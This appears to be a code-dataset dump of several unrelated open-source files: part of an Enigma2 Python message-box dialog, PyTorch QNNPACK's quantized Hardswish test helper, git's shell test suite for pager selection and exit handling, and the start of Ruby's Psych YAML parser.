MultiContentEntryText(pos = (65, 10), size = (425, 38), font=0, flags = RT_HALIGN_LEFT|RT_VALIGN_TOP, text = 1),
],
"fonts": [gFont("Regular", 22)],
"itemHeight": 48
}
</convert>
</widget>
<applet type="onLayoutFinish">
# this should be factored out into some helper code, but currently demonstrates applets.
from enigma import eSize, ePoint
orgwidth = self.instance.size().width()
orgheight = self.instance.size().height()
orgpos = self.instance.position()
textsize = self["message"].getSize()
# y size still must be fixed in font stuff...
if self["message"].getText() != "":
textsize = (textsize[0] + 80, textsize[1] + 60)
else:
textsize = (textsize[0] + 80, textsize[1] + 4)
count = len(self.list)
if count > 7:
count = 7
offset = 48 * count
wsizex = textsize[0] + 80
wsizey = textsize[1] + offset + 20
if (460 > wsizex):
wsizex = 460
wsize = (wsizex, wsizey)
# resize
self.instance.resize(eSize(*wsize))
# resize label
self["message"].instance.resize(eSize(*textsize))
# move list
listsize = (wsizex - 20, 48 * count)
self["menu"].downstream_elements.downstream_elements.instance.move(ePoint(10, textsize[1] + 10))
self["menu"].downstream_elements.downstream_elements.instance.resize(eSize(*listsize))
# center window
newwidth = wsize[0]
newheight = wsize[1]
self.instance.move(ePoint(orgpos.x() + (orgwidth - newwidth)/2, orgpos.y() + (orgheight - newheight)/2))
</applet>
</screen>"""

    def __init__(self, session, message = "", title = "", menulist = [], type = 0, exitid = -1, default = 0, timeout = 0):
        """Build the dialog; menulist items are (label, icon-filename) pairs."""
        # NOTE(review): menulist=[] is a shared mutable default; it is only
        # iterated here so it is harmless, but a None default would be safer.
        # type exist for compability... will be ignored
        Screen.__init__(self, session)
        self.session = session
        self.ctitle = title      # base window title (countdown is appended)
        self.exitid = exitid     # index reported on cancel; -1 disables cancel
        self.default = default   # initially selected row
        self.timeout = timeout   # seconds before auto-confirm; 0 disables
        self.elapsed = 0         # seconds counted so far
        self.list = []
        for item in menulist:
            self.list.append(MessageBoxEntry(item[0], item[1]))
        self['menu'] = List(self.list)
        self["menu"].onSelectionChanged.append(self.selectionChanged)
        self["message"] = Label(message)
        self["actions"] = ActionMap(["SetupActions"],
        {
            "ok": self.ok,
            "cancel": self.cancel
        }, -2)
        self.onLayoutFinish.append(self.layoutFinished)
        # Single-shot timer, re-armed once per second while counting down.
        self.timer = eTimer()
        self.timer.callback.append(self.timeoutStep)
        if self.timeout > 0:
            self.timer.start(1000, 1)

    def selectionChanged(self):
        # Any user interaction cancels the countdown and restores the title.
        self.timer.stop()
        self.setTitle(self.ctitle)

    def timeoutStep(self):
        self.elapsed += 1
        if self.elapsed == self.timeout:
            # Countdown finished: behave as if the user pressed OK.
            self.ok()
        else:
            # Show remaining seconds in the title and re-arm the timer.
            self.setTitle("%s - %d" % (self.ctitle, self.timeout - self.elapsed))
            self.timer.start(1000, 1)

    def layoutFinished(self):
        if self.timeout > 0:
            self.setTitle("%s - %d" % (self.ctitle, self.timeout))
        else:
            self.setTitle(self.ctitle)
        self['menu'].setCurrentIndex(self.default)

    def ok(self):
        # Close with the selected row index as the dialog result.
        index = self['menu'].getIndex()
        self.close(index)

    def cancel(self):
        # NOTE(review): when exitid == -1, cancel is a no-op and the dialog
        # stays open -- presumably intentional; confirm with callers.
        if self.exitid > -1:
            self.close(self.exitid)
|
unknown
|
codeparrot/codeparrot-clean
| ||
/*
* Copyright (c) Facebook, Inc. and its affiliates.
* All rights reserved.
*
* This source code is licensed under the BSD-style license found in the
* LICENSE file in the root directory of this source tree.
*/
#pragma once
#include <algorithm>
#include <cassert>
#include <cmath>
#include <cstddef>
#include <cstdlib>
#include <functional>
#include <random>
#include <vector>
#include <pytorch_qnnpack.h>
// Fluent builder/tester for QNNPACK's quantized (uint8) Hardswish operator.
// Configure via the chained setters, then call testQ8(), which compares the
// operator output against a float reference within a fixed tolerance.
// NOTE(review): relies on gtest ASSERT_* macros being provided by the
// including test file -- this header does not include gtest itself.
class HardswishOperatorTester {
 public:
  // Number of channels per batch element (must be non-zero).
  inline HardswishOperatorTester& channels(size_t channels) {
    assert(channels != 0);
    this->channels_ = channels;
    return *this;
  }

  inline size_t channels() const {
    return this->channels_;
  }

  // Element stride between consecutive batch rows of the input
  // (must be non-zero; when unset, defaults to channels()).
  inline HardswishOperatorTester& inputStride(size_t inputStride) {
    assert(inputStride != 0);
    this->inputStride_ = inputStride;
    return *this;
  }

  inline size_t inputStride() const {
    // 0 is the "unset" sentinel: fall back to a dense layout.
    if (this->inputStride_ == 0) {
      return this->channels_;
    } else {
      assert(this->inputStride_ >= this->channels_);
      return this->inputStride_;
    }
  }

  // Element stride between consecutive batch rows of the output
  // (must be non-zero; when unset, defaults to channels()).
  inline HardswishOperatorTester& outputStride(size_t outputStride) {
    assert(outputStride != 0);
    this->outputStride_ = outputStride;
    return *this;
  }

  inline size_t outputStride() const {
    // 0 is the "unset" sentinel: fall back to a dense layout.
    if (this->outputStride_ == 0) {
      return this->channels_;
    } else {
      assert(this->outputStride_ >= this->channels_);
      return this->outputStride_;
    }
  }

  inline HardswishOperatorTester& batchSize(size_t batchSize) {
    this->batchSize_ = batchSize;
    return *this;
  }

  inline size_t batchSize() const {
    return this->batchSize_;
  }

  // Input quantization scale (must be positive and a normal float).
  inline HardswishOperatorTester& inputScale(float inputScale) {
    assert(inputScale > 0.0f);
    assert(std::isnormal(inputScale));
    this->inputScale_ = inputScale;
    return *this;
  }

  inline float inputScale() const {
    return this->inputScale_;
  }

  inline HardswishOperatorTester& inputZeroPoint(uint8_t inputZeroPoint) {
    this->inputZeroPoint_ = inputZeroPoint;
    return *this;
  }

  inline uint8_t inputZeroPoint() const {
    return this->inputZeroPoint_;
  }

  // Output quantization scale (must be positive and a normal float).
  inline HardswishOperatorTester& outputScale(float outputScale) {
    assert(outputScale > 0.0f);
    assert(std::isnormal(outputScale));
    this->outputScale_ = outputScale;
    return *this;
  }

  inline float outputScale() const {
    return this->outputScale_;
  }

  inline HardswishOperatorTester& outputZeroPoint(uint8_t outputZeroPoint) {
    this->outputZeroPoint_ = outputZeroPoint;
    return *this;
  }

  inline uint8_t outputZeroPoint() const {
    return this->outputZeroPoint_;
  }

  // Lower clamp bound for the quantized output.
  inline HardswishOperatorTester& qmin(uint8_t qmin) {
    this->qmin_ = qmin;
    return *this;
  }

  inline uint8_t qmin() const {
    return this->qmin_;
  }

  // Upper clamp bound for the quantized output.
  inline HardswishOperatorTester& qmax(uint8_t qmax) {
    this->qmax_ = qmax;
    return *this;
  }

  inline uint8_t qmax() const {
    return this->qmax_;
  }

  // Number of create/run/verify repetitions with fresh random inputs.
  inline HardswishOperatorTester& iterations(size_t iterations) {
    this->iterations_ = iterations;
    return *this;
  }

  inline size_t iterations() const {
    return this->iterations_;
  }

  // Run the Q8 hardswish operator and compare each element against a float
  // reference: x * min(max(x + 3, 0), 6) / 6, dequantized, rescaled, and
  // clamped to [qmin - zero_point, qmax - zero_point].
  void testQ8() const {
    std::random_device randomDevice;
    auto rng = std::mt19937(randomDevice());
    auto u8rng = std::bind(std::uniform_int_distribution<uint8_t>(), rng);

    // Strided buffers: only the first channels() of each row are checked.
    std::vector<uint8_t> input((batchSize() - 1) * inputStride() + channels());
    std::vector<uint8_t> output(
        (batchSize() - 1) * outputStride() + channels());
    std::vector<float> outputRef(batchSize() * channels());
    for (size_t iteration = 0; iteration < iterations(); iteration++) {
      std::generate(input.begin(), input.end(), std::ref(u8rng));
      // Poison the output so untouched bytes are detectable.
      std::fill(output.begin(), output.end(), 0xA5);

      /* Compute reference results */
      for (size_t i = 0; i < batchSize(); i++) {
        for (size_t c = 0; c < channels(); c++) {
          // Dequantize the input value.
          const float x = inputScale() *
              (int32_t(input[i * inputStride() + c]) -
               int32_t(inputZeroPoint()));
          const float hardswishX =
              x * std::min(std::max(x + 3.0f, 0.0f), 6.0f) / 6.0f;
          const float scaledHardswishX = hardswishX / outputScale();
          float y = scaledHardswishX;
          // Clamp in the zero-point-shifted domain.
          y = std::min<float>(y, int32_t(qmax()) - int32_t(outputZeroPoint()));
          y = std::max<float>(y, int32_t(qmin()) - int32_t(outputZeroPoint()));
          outputRef[i * channels() + c] = y + int32_t(outputZeroPoint());
        }
      }

      /* Create, setup, run, and destroy Hardswish operator */
      ASSERT_EQ(pytorch_qnnp_status_success, pytorch_qnnp_initialize());
      pytorch_qnnp_operator_t hardswishOp = nullptr;
      ASSERT_EQ(
          pytorch_qnnp_status_success,
          pytorch_qnnp_create_hardswish_nc_q8(
              channels(),
              inputZeroPoint(),
              inputScale(),
              outputZeroPoint(),
              outputScale(),
              qmin(),
              qmax(),
              0,
              &hardswishOp));
      ASSERT_NE(nullptr, hardswishOp);

      ASSERT_EQ(
          pytorch_qnnp_status_success,
          pytorch_qnnp_setup_hardswish_nc_q8(
              hardswishOp,
              batchSize(),
              input.data(),
              inputStride(),
              output.data(),
              outputStride()));

      ASSERT_EQ(
          pytorch_qnnp_status_success,
          pytorch_qnnp_run_operator(hardswishOp, nullptr /* thread pool */));

      ASSERT_EQ(
          pytorch_qnnp_status_success, pytorch_qnnp_delete_operator(hardswishOp));
      hardswishOp = nullptr;

      /* Verify results */
      // 0.6 quantization units of slack covers rounding in the kernel.
      for (size_t i = 0; i < batchSize(); i++) {
        for (size_t c = 0; c < channels(); c++) {
          ASSERT_NEAR(
              float(int32_t(output[i * outputStride() + c])),
              outputRef[i * channels() + c],
              0.6f);
        }
      }
    }
  }

 private:
  size_t batchSize_{1};
  size_t channels_{1};
  size_t inputStride_{0};   // 0 means "use channels()"
  size_t outputStride_{0};  // 0 means "use channels()"
  float inputScale_{0.75f};
  uint8_t inputZeroPoint_{121};
  float outputScale_{0.75f};
  uint8_t outputZeroPoint_{121};
  uint8_t qmin_{0};
  uint8_t qmax_{255};
  size_t iterations_{15};
};
|
c
|
github
|
https://github.com/pytorch/pytorch
|
aten/src/ATen/native/quantized/cpu/qnnpack/test/hardswish-operator-tester.h
|
#!/bin/sh
# Exercises git's automatic pager selection: core.pager, $PAGER, $GIT_PAGER,
# per-command pager.<cmd> configuration, and the -p/--no-pager options.

test_description='Test automatic use of a pager.'
. ./test-lib.sh
. "$TEST_DIRECTORY"/lib-pager.sh
. "$TEST_DIRECTORY"/lib-terminal.sh

# Pagination is observed through the stamp file written by $PAGER.
test_expect_success 'setup' '
sane_unset GIT_PAGER GIT_PAGER_IN_USE &&
test_unconfig core.pager &&
PAGER="cat >paginated.out" &&
export PAGER &&
test_commit initial
'
test_expect_success TTY 'some commands use a pager' '
rm -f paginated.out &&
test_terminal git log &&
test_path_is_file paginated.out
'
test_expect_failure TTY 'pager runs from subdir' '
echo subdir/paginated.out >expected &&
mkdir -p subdir &&
rm -f paginated.out subdir/paginated.out &&
(
cd subdir &&
test_terminal git log
) &&
{
ls paginated.out subdir/paginated.out ||
:
} >actual &&
test_cmp expected actual
'
test_expect_success TTY 'LESS and LV envvars are set for pagination' '
(
sane_unset LESS LV &&
PAGER="env >pager-env.out; wc" &&
export PAGER &&
test_terminal git log
) &&
grep ^LESS= pager-env.out &&
grep ^LV= pager-env.out
'
test_expect_success !MINGW,TTY 'LESS and LV envvars set by git-sh-setup' '
(
sane_unset LESS LV &&
PAGER="env >pager-env.out; wc" &&
export PAGER &&
PATH="$(git --exec-path):$PATH" &&
export PATH &&
test_terminal sh -c ". git-sh-setup && git_pager"
) &&
grep ^LESS= pager-env.out &&
grep ^LV= pager-env.out
'
test_expect_success TTY 'some commands do not use a pager' '
rm -f paginated.out &&
test_terminal git rev-list HEAD &&
test_path_is_missing paginated.out
'
test_expect_success 'no pager when stdout is a pipe' '
rm -f paginated.out &&
git log | cat &&
test_path_is_missing paginated.out
'
test_expect_success 'no pager when stdout is a regular file' '
rm -f paginated.out &&
git log >file &&
test_path_is_missing paginated.out
'
test_expect_success TTY 'git --paginate rev-list uses a pager' '
rm -f paginated.out &&
test_terminal git --paginate rev-list HEAD &&
test_path_is_file paginated.out
'
test_expect_success 'no pager even with --paginate when stdout is a pipe' '
rm -f file paginated.out &&
git --paginate log | cat &&
test_path_is_missing paginated.out
'
test_expect_success TTY 'no pager with --no-pager' '
rm -f paginated.out &&
test_terminal git --no-pager log &&
test_path_is_missing paginated.out
'
test_expect_success TTY 'configuration can disable pager' '
rm -f paginated.out &&
test_unconfig pager.grep &&
test_terminal git grep initial &&
test_path_is_file paginated.out &&
rm -f paginated.out &&
test_config pager.grep false &&
test_terminal git grep initial &&
test_path_is_missing paginated.out
'
test_expect_success TTY 'configuration can enable pager (from subdir)' '
rm -f paginated.out &&
mkdir -p subdir &&
test_config pager.bundle true &&
git bundle create test.bundle --all &&
rm -f paginated.out subdir/paginated.out &&
(
cd subdir &&
test_terminal git bundle unbundle ../test.bundle
) &&
{
test_path_is_file paginated.out ||
test_path_is_file subdir/paginated.out
}
'
test_expect_success TTY 'git tag -l defaults to paging' '
rm -f paginated.out &&
test_terminal git tag -l &&
test_path_is_file paginated.out
'
test_expect_success TTY 'git tag -l respects pager.tag' '
rm -f paginated.out &&
test_terminal git -c pager.tag=false tag -l &&
test_path_is_missing paginated.out
'
test_expect_success TTY 'git tag -l respects --no-pager' '
rm -f paginated.out &&
test_terminal git -c pager.tag --no-pager tag -l &&
test_path_is_missing paginated.out
'
test_expect_success TTY 'git tag with no args defaults to paging' '
# no args implies -l so this should page like -l
rm -f paginated.out &&
test_terminal git tag &&
test_path_is_file paginated.out
'
test_expect_success TTY 'git tag with no args respects pager.tag' '
# no args implies -l so this should page like -l
rm -f paginated.out &&
test_terminal git -c pager.tag=false tag &&
test_path_is_missing paginated.out
'
test_expect_success TTY 'git tag --contains defaults to paging' '
# --contains implies -l so this should page like -l
rm -f paginated.out &&
test_terminal git tag --contains &&
test_path_is_file paginated.out
'
test_expect_success TTY 'git tag --contains respects pager.tag' '
# --contains implies -l so this should page like -l
rm -f paginated.out &&
test_terminal git -c pager.tag=false tag --contains &&
test_path_is_missing paginated.out
'
test_expect_success TTY 'git tag -a defaults to not paging' '
test_when_finished "git tag -d newtag" &&
rm -f paginated.out &&
test_terminal git tag -am message newtag &&
test_path_is_missing paginated.out
'
test_expect_success TTY 'git tag -a ignores pager.tag' '
test_when_finished "git tag -d newtag" &&
rm -f paginated.out &&
test_terminal git -c pager.tag tag -am message newtag &&
test_path_is_missing paginated.out
'
test_expect_success TTY 'git tag -a respects --paginate' '
test_when_finished "git tag -d newtag" &&
rm -f paginated.out &&
test_terminal git --paginate tag -am message newtag &&
test_path_is_file paginated.out
'
test_expect_success TTY 'git tag as alias ignores pager.tag with -a' '
test_when_finished "git tag -d newtag" &&
rm -f paginated.out &&
test_terminal git -c pager.tag -c alias.t=tag t -am message newtag &&
test_path_is_missing paginated.out
'
test_expect_success TTY 'git tag as alias respects pager.tag with -l' '
rm -f paginated.out &&
test_terminal git -c pager.tag=false -c alias.t=tag t -l &&
test_path_is_missing paginated.out
'
test_expect_success TTY 'git branch defaults to paging' '
rm -f paginated.out &&
test_terminal git branch &&
test_path_is_file paginated.out
'
test_expect_success TTY 'git branch respects pager.branch' '
rm -f paginated.out &&
test_terminal git -c pager.branch=false branch &&
test_path_is_missing paginated.out
'
test_expect_success TTY 'git branch respects --no-pager' '
rm -f paginated.out &&
test_terminal git --no-pager branch &&
test_path_is_missing paginated.out
'
test_expect_success TTY 'git branch --edit-description ignores pager.branch' '
rm -f paginated.out editor.used &&
write_script editor <<-\EOF &&
echo "New description" >"$1"
touch editor.used
EOF
EDITOR=./editor test_terminal git -c pager.branch branch --edit-description &&
test_path_is_missing paginated.out &&
test_path_is_file editor.used
'
test_expect_success TTY 'git branch --set-upstream-to ignores pager.branch' '
rm -f paginated.out &&
git branch other &&
test_when_finished "git branch -D other" &&
test_terminal git -c pager.branch branch --set-upstream-to=other &&
test_when_finished "git branch --unset-upstream" &&
test_path_is_missing paginated.out
'
test_expect_success TTY 'git config ignores pager.config when setting' '
rm -f paginated.out &&
test_terminal git -c pager.config config foo.bar bar &&
test_path_is_missing paginated.out
'
test_expect_success TTY 'git config --edit ignores pager.config' '
rm -f paginated.out editor.used &&
write_script editor <<-\EOF &&
touch editor.used
EOF
EDITOR=./editor test_terminal git -c pager.config config --edit &&
test_path_is_missing paginated.out &&
test_path_is_file editor.used
'
test_expect_success TTY 'git config --get ignores pager.config' '
rm -f paginated.out &&
test_terminal git -c pager.config config --get foo.bar &&
test_path_is_missing paginated.out
'
test_expect_success TTY 'git config --get-urlmatch defaults to paging' '
rm -f paginated.out &&
test_terminal git -c http."https://foo.com/".bar=foo \
config --get-urlmatch http https://foo.com &&
test_path_is_file paginated.out
'
test_expect_success TTY 'git config --get-all respects pager.config' '
rm -f paginated.out &&
test_terminal git -c pager.config=false config --get-all foo.bar &&
test_path_is_missing paginated.out
'
test_expect_success TTY 'git config --list defaults to paging' '
rm -f paginated.out &&
test_terminal git config --list &&
test_path_is_file paginated.out
'
# A colored commit log will begin with an appropriate ANSI escape
# for the first color; the text "commit" comes later.
colorful() {
	# A colored log begins with an ANSI escape rather than a letter; the
	# `!` inverts expr's leading-letter match, so this succeeds when the
	# file in $1 looks colored.
	read firstline <$1
	! expr "$firstline" : "[a-zA-Z]" >/dev/null
}
test_expect_success 'tests can detect color' '
rm -f colorful.log colorless.log &&
git log --no-color >colorless.log &&
git log --color >colorful.log &&
! colorful colorless.log &&
colorful colorful.log
'
test_expect_success 'no color when stdout is a regular file' '
rm -f colorless.log &&
test_config color.ui auto &&
git log >colorless.log &&
! colorful colorless.log
'
test_expect_success TTY 'color when writing to a pager' '
rm -f paginated.out &&
test_config color.ui auto &&
test_terminal git log &&
colorful paginated.out
'
test_expect_success TTY 'colors are suppressed by color.pager' '
rm -f paginated.out &&
test_config color.ui auto &&
test_config color.pager false &&
test_terminal git log &&
! colorful paginated.out
'
test_expect_success 'color when writing to a file intended for a pager' '
rm -f colorful.log &&
test_config color.ui auto &&
(
TERM=vt100 &&
GIT_PAGER_IN_USE=true &&
export TERM GIT_PAGER_IN_USE &&
git log >colorful.log
) &&
colorful colorful.log
'
test_expect_success TTY 'colors are sent to pager for external commands' '
test_config alias.externallog "!git log" &&
test_config color.ui auto &&
test_terminal git -p externallog &&
colorful paginated.out
'
# Use this helper to make it easy for the caller of your
# terminal-using function to specify whether it should fail.
# If you write
#
# your_test() {
# parse_args "$@"
#
# $test_expectation "$cmd - behaves well" "
# ...
# $full_command &&
# ...
# "
# }
#
# then your test can be used like this:
#
# your_test expect_(success|failure) [test_must_fail] 'git foo'
#
parse_args() {
	# Parse: <expect_(success|failure)> [test_must_fail] '<git command>'.
	# Sets $test_expectation, $cmd, and $full_command for the caller.
	test_expectation="test_$1"
	shift
	if test "$1" = test_must_fail
	then
		full_command="test_must_fail test_terminal "
		shift
	else
		full_command="test_terminal "
	fi
	cmd=$1
	full_command="$full_command $1"
}
test_default_pager() {
	# Verify that a `less` found on $PATH is used when nothing else is
	# configured; the fake pager records a stamp file when invoked.
	parse_args "$@"

	$test_expectation SIMPLEPAGER,TTY "$cmd - default pager is used by default" "
sane_unset PAGER GIT_PAGER &&
test_unconfig core.pager &&
rm -f default_pager_used &&
cat >\$less <<-\EOF &&
#!/bin/sh
wc >default_pager_used
EOF
chmod +x \$less &&
(
PATH=.:\$PATH &&
export PATH &&
$full_command
) &&
test_path_is_file default_pager_used
"
}
test_PAGER_overrides() {
	# Verify that $PAGER takes precedence over the built-in default pager.
	parse_args "$@"

	$test_expectation TTY "$cmd - PAGER overrides default pager" "
sane_unset GIT_PAGER &&
test_unconfig core.pager &&
rm -f PAGER_used &&
PAGER='wc >PAGER_used' &&
export PAGER &&
$full_command &&
test_path_is_file PAGER_used
"
}
test_core_pager_overrides() {
	# core.pager is expected to win over $PAGER here.
	if_local_config=
	used_if_wanted='overrides PAGER'
	test_core_pager "$@"
}
test_local_config_ignored() {
	# Repository-local core.pager must NOT take effect in this scenario.
	if_local_config='! '
	used_if_wanted='is not used'
	test_core_pager "$@"
}
test_core_pager() {
	# Shared body for the two wrappers above: runs $cmd with core.pager set
	# and checks (or negates, via $if_local_config) that it was used.
	parse_args "$@"

	$test_expectation TTY "$cmd - repository-local core.pager setting $used_if_wanted" "
sane_unset GIT_PAGER &&
rm -f core.pager_used &&
PAGER=wc &&
export PAGER &&
test_config core.pager 'wc >core.pager_used' &&
$full_command &&
${if_local_config}test_path_is_file core.pager_used
"
}
test_core_pager_subdir() {
	# Same as test_core_pager_overrides, but the command runs in a subdir.
	if_local_config=
	used_if_wanted='overrides PAGER'
	test_pager_subdir_helper "$@"
}
test_no_local_config_subdir() {
	# Same as test_local_config_ignored, but the command runs in a subdir.
	if_local_config='! '
	used_if_wanted='is not used'
	test_pager_subdir_helper "$@"
}
test_pager_subdir_helper() {
	# Shared body for the two subdir wrappers: the stamp path is made
	# absolute so the pager writes it regardless of the cwd.
	parse_args "$@"

	$test_expectation TTY "$cmd - core.pager $used_if_wanted from subdirectory" "
sane_unset GIT_PAGER &&
rm -f core.pager_used &&
rm -fr sub &&
PAGER=wc &&
stampname=\$(pwd)/core.pager_used &&
export PAGER stampname &&
test_config core.pager 'wc >\"\$stampname\"' &&
mkdir sub &&
(
cd sub &&
$full_command
) &&
${if_local_config}test_path_is_file core.pager_used
"
}
test_GIT_PAGER_overrides() {
	# Verify that $GIT_PAGER takes precedence over core.pager.
	parse_args "$@"

	$test_expectation TTY "$cmd - GIT_PAGER overrides core.pager" "
rm -f GIT_PAGER_used &&
test_config core.pager wc &&
GIT_PAGER='wc >GIT_PAGER_used' &&
export GIT_PAGER &&
$full_command &&
test_path_is_file GIT_PAGER_used
"
}
test_doesnt_paginate() {
	# Verify that $cmd does NOT start a pager even with $GIT_PAGER set.
	parse_args "$@"

	$test_expectation TTY "no pager for '$cmd'" "
rm -f GIT_PAGER_used &&
GIT_PAGER='wc >GIT_PAGER_used' &&
export GIT_PAGER &&
$full_command &&
test_path_is_missing GIT_PAGER_used
"
}
test_pager_choices() {
	# Run the full precedence matrix (default < PAGER < core.pager <
	# GIT_PAGER), including the subdirectory variant, for one command.
	test_default_pager expect_success "$@"
	test_PAGER_overrides expect_success "$@"
	test_core_pager_overrides expect_success "$@"
	test_core_pager_subdir expect_success "$@"
	test_GIT_PAGER_overrides expect_success "$@"
}
test_expect_success 'setup: some aliases' '
git config alias.aliasedlog log &&
git config alias.true "!true"
'
test_pager_choices 'git log'
test_pager_choices 'git -p log'
test_pager_choices 'git aliasedlog'
test_default_pager expect_success 'git -p aliasedlog'
test_PAGER_overrides expect_success 'git -p aliasedlog'
test_core_pager_overrides expect_success 'git -p aliasedlog'
test_core_pager_subdir expect_success 'git -p aliasedlog'
test_GIT_PAGER_overrides expect_success 'git -p aliasedlog'
test_default_pager expect_success 'git -p true'
test_PAGER_overrides expect_success 'git -p true'
test_core_pager_overrides expect_success 'git -p true'
test_core_pager_subdir expect_success 'git -p true'
test_GIT_PAGER_overrides expect_success 'git -p true'
test_default_pager expect_success test_must_fail 'git -p request-pull'
test_PAGER_overrides expect_success test_must_fail 'git -p request-pull'
test_core_pager_overrides expect_success test_must_fail 'git -p request-pull'
test_core_pager_subdir expect_success test_must_fail 'git -p request-pull'
test_GIT_PAGER_overrides expect_success test_must_fail 'git -p request-pull'
test_default_pager expect_success test_must_fail 'git -p'
test_PAGER_overrides expect_success test_must_fail 'git -p'
test_local_config_ignored expect_failure test_must_fail 'git -p'
test_GIT_PAGER_overrides expect_success test_must_fail 'git -p'
test_expect_success TTY 'core.pager in repo config works and retains cwd' '
sane_unset GIT_PAGER &&
test_config core.pager "cat >cwd-retained" &&
(
cd sub &&
rm -f cwd-retained &&
test_terminal git -p rev-parse HEAD &&
test_path_is_file cwd-retained
)
'
test_expect_success TTY 'core.pager is found via alias in subdirectory' '
sane_unset GIT_PAGER &&
test_config core.pager "cat >via-alias" &&
(
cd sub &&
rm -f via-alias &&
test_terminal git -c alias.r="-p rev-parse" r HEAD &&
test_path_is_file via-alias
)
'
test_doesnt_paginate expect_failure test_must_fail 'git -p nonsense'
test_pager_choices 'git shortlog'
test_expect_success 'setup: configure shortlog not to paginate' '
git config pager.shortlog false
'
test_doesnt_paginate expect_success 'git shortlog'
test_no_local_config_subdir expect_success 'git shortlog'
test_default_pager expect_success 'git -p shortlog'
test_core_pager_subdir expect_success 'git -p shortlog'
test_core_pager_subdir expect_success test_must_fail \
'git -p apply </dev/null'
test_expect_success TTY 'command-specific pager' '
sane_unset PAGER GIT_PAGER &&
echo "foo:initial" >expect &&
>actual &&
test_unconfig core.pager &&
test_config pager.log "sed s/^/foo:/ >actual" &&
test_terminal git log --format=%s -1 &&
test_cmp expect actual
'
test_expect_success TTY 'command-specific pager overrides core.pager' '
sane_unset PAGER GIT_PAGER &&
echo "foo:initial" >expect &&
>actual &&
test_config core.pager "exit 1" &&
test_config pager.log "sed s/^/foo:/ >actual" &&
test_terminal git log --format=%s -1 &&
test_cmp expect actual
'
# An explicit GIT_PAGER in the environment beats a pager.<cmd> config entry.
test_expect_success TTY 'command-specific pager overridden by environment' '
GIT_PAGER="sed s/^/foo:/ >actual" && export GIT_PAGER &&
>actual &&
echo "foo:initial" >expect &&
test_config pager.log "exit 1" &&
test_terminal git log --format=%s -1 &&
test_cmp expect actual
'
# Install a "git-external" wrapper so the following tests can exercise
# pager selection for commands found on --exec-path.
test_expect_success 'setup external command' '
cat >git-external <<-\EOF &&
#!/bin/sh
git "$@"
EOF
chmod +x git-external
'
test_expect_success TTY 'command-specific pager works for external commands' '
sane_unset PAGER GIT_PAGER &&
echo "foo:initial" >expect &&
>actual &&
test_config pager.external "sed s/^/foo:/ >actual" &&
test_terminal git --exec-path="$(pwd)" external log --format=%s -1 &&
test_cmp expect actual
'
test_expect_success TTY 'sub-commands of externals use their own pager' '
sane_unset PAGER GIT_PAGER &&
echo "foo:initial" >expect &&
>actual &&
test_config pager.log "sed s/^/foo:/ >actual" &&
test_terminal git --exec-path=. external log --format=%s -1 &&
test_cmp expect actual
'
# pager.external (the outer command) wins over pager.log (the sub-command).
test_expect_success TTY 'external command pagers override sub-commands' '
sane_unset PAGER GIT_PAGER &&
>actual &&
test_config pager.external false &&
test_config pager.log "sed s/^/log:/ >actual" &&
test_terminal git --exec-path=. external log --format=%s -1 &&
test_must_be_empty actual
'
test_expect_success 'command with underscores does not complain' '
write_script git-under_score <<-\EOF &&
echo ok
EOF
git --exec-path=. under_score >actual 2>&1 &&
echo ok >expect &&
test_cmp expect actual
'
test_expect_success TTY 'git tag with auto-columns ' '
test_commit one &&
test_commit two &&
test_commit three &&
test_commit four &&
test_commit five &&
cat >expect <<-\EOF &&
initial one two three four five
EOF
test_terminal env PAGER="cat >actual" COLUMNS=80 \
git -c column.ui=auto tag --sort=authordate &&
test_cmp expect actual
'
# The remaining tests inspect trace2 child_exit events to verify how git
# reports the pager process's exit status.
test_expect_success 'setup trace2' '
GIT_TRACE2_BRIEF=1 &&
export GIT_TRACE2_BRIEF
'
test_expect_success 'setup large log output' '
test-tool genzeros 50000 |
tr "\000" "a" |
sed "s/a/this is a long commit message/g" >commit-msg &&
git commit --allow-empty -F commit-msg
'
test_expect_success TTY 'git returns SIGPIPE on early pager exit' '
test_when_finished "rm pager-used trace.normal" &&
test_config core.pager ">pager-used; head -n 1; exit 0" &&
GIT_TRACE2="$(pwd)/trace.normal" &&
export GIT_TRACE2 &&
test_when_finished "unset GIT_TRACE2" &&
if test_have_prereq !MINGW
then
{ test_terminal git log >/dev/null; OUT=$?; } &&
test_match_signal 13 "$OUT"
else
test_terminal git log
fi &&
grep child_exit trace.normal >child-exits &&
test_line_count = 1 child-exits &&
grep " code:0 " child-exits &&
test_path_is_file pager-used
'
test_expect_success TTY 'git returns SIGPIPE on early pager non-zero exit' '
test_when_finished "rm pager-used trace.normal" &&
test_config core.pager ">pager-used; head -n 1; exit 1" &&
GIT_TRACE2="$(pwd)/trace.normal" &&
export GIT_TRACE2 &&
test_when_finished "unset GIT_TRACE2" &&
if test_have_prereq !MINGW
then
{ test_terminal git log >/dev/null; OUT=$?; } &&
test_match_signal 13 "$OUT"
else
test_terminal git log
fi &&
grep child_exit trace.normal >child-exits &&
test_line_count = 1 child-exits &&
grep " code:1 " child-exits &&
test_path_is_file pager-used
'
# When the pager consumes all output (wc), its non-zero exit must not be
# turned into a SIGPIPE for git itself.
test_expect_success TTY 'git discards pager non-zero exit without SIGPIPE' '
test_when_finished "rm pager-used trace.normal" &&
test_config core.pager "wc >pager-used; exit 1" &&
GIT_TRACE2="$(pwd)/trace.normal" &&
export GIT_TRACE2 &&
test_when_finished "unset GIT_TRACE2" &&
test_terminal git log &&
grep child_exit trace.normal >child-exits &&
test_line_count = 1 child-exits &&
grep " code:1 " child-exits &&
test_path_is_file pager-used
'
test_expect_success TTY 'git errors when asked to execute nonexisting pager' '
test_when_finished "rm -f err" &&
test_config core.pager "does-not-exist" &&
test_must_fail test_terminal git log 2>err &&
test_grep "unable to execute pager" err
'
test_expect_success TTY 'git returns SIGPIPE on propagated signals from pager' '
test_when_finished "rm pager-used trace.normal" &&
test_config core.pager ">pager-used; exec test-tool sigchain" &&
GIT_TRACE2="$(pwd)/trace.normal" &&
export GIT_TRACE2 &&
test_when_finished "unset GIT_TRACE2" &&
if test_have_prereq !MINGW
then
{ test_terminal git log >/dev/null; OUT=$?; } &&
test_match_signal 13 "$OUT"
else
test_terminal git log
fi &&
grep child_exit trace.normal >child-exits &&
test_line_count = 1 child-exits &&
grep " code:143 " child-exits &&
test_path_is_file pager-used
'
test_expect_success TTY 'non-existent pager doesnt cause crash' '
test_config pager.show invalid-pager &&
test_must_fail test_terminal git show
'
test_done
|
unknown
|
github
|
https://github.com/git/git
|
t/t7006-pager.sh
|
# frozen_string_literal: true
module Psych
  ###
  # YAML event parser class. This class parses a YAML document and calls
  # events on the handler that is passed to the constructor. The events can
